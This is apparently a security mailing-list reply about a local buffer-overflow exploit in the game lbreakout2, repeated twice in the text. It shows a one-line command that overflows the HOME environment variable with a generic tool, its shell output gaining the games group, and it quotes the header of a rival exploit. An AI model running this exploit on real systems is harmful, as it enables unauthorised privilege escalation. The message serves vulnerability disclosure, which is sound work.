Using the `env-overflow` tool this may be exploited without
the need for a valid X11 display - ie. ssh/telnet access
sufficient - or any explicit coding:
skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME
... snip ...
sh-2.05a$
sh-2.05a$ id
uid=1000(skx) gid=100(users) egid=60(games) groups=100(users)
Where env-overflow lives here:
http://www.steve.org.uk/Hacks/generic.html
Steve
--
# Debian Security Audit Project
http://www.shellcode.org/Audit/
> /*
> * lbreakout2 < 2.4beta-2 local exploit by Li0n7 (at) voila (dot) fr [email concealed]
> * vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485 (at) student.uu (dot) se [email concealed]>
> * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
> *
> */
I much prefer mine ;)
Using the `env-overflow` tool this may be exploited without
the need for a valid X11 display - ie. ssh/telnet access
sufficient - or any explicit coding:
skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME
... snip ...
sh-2.05a$
sh-2.05a$ id
uid=1000(skx) gid=100(users) egid=60(games) groups=100(users)
Where env-overflow lives here:
http://www.steve.org.uk/Hacks/generic.html
Steve
--
# Debian Security Audit Project
http://www.shellcode.org/Audit/
[ reply ]